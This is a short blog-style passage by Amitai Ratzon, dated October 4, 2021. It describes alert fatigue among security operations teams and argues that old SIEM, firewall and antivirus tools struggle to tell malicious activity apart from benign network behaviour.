October 4, 2021 By Amitai Ratzon
Security operations teams have been dealing with “alert fatigue” for far too long.
The introduction of log monitoring (e.g., SIEM), firewall, and AV technologies over two decades ago provided valuable tools for IT teams to be alerted to known suspicious network behavior. However, as time goes by and digital transformation is at a record high, the underlying technologies supporting security teams on their day-to-day operation have not changed.
It is now harder than ever to distinguish between benign and malicious behavior as attacks have turned more sophisticated, often using legitimate operating system toolsets, and are harder to spot amongst regular network behavior. The problem is not all suspicious behavior is malicious behavior – far from it. As a result, what was supposed to provide a useful glimpse into network activity has become the bane of many security professionals.
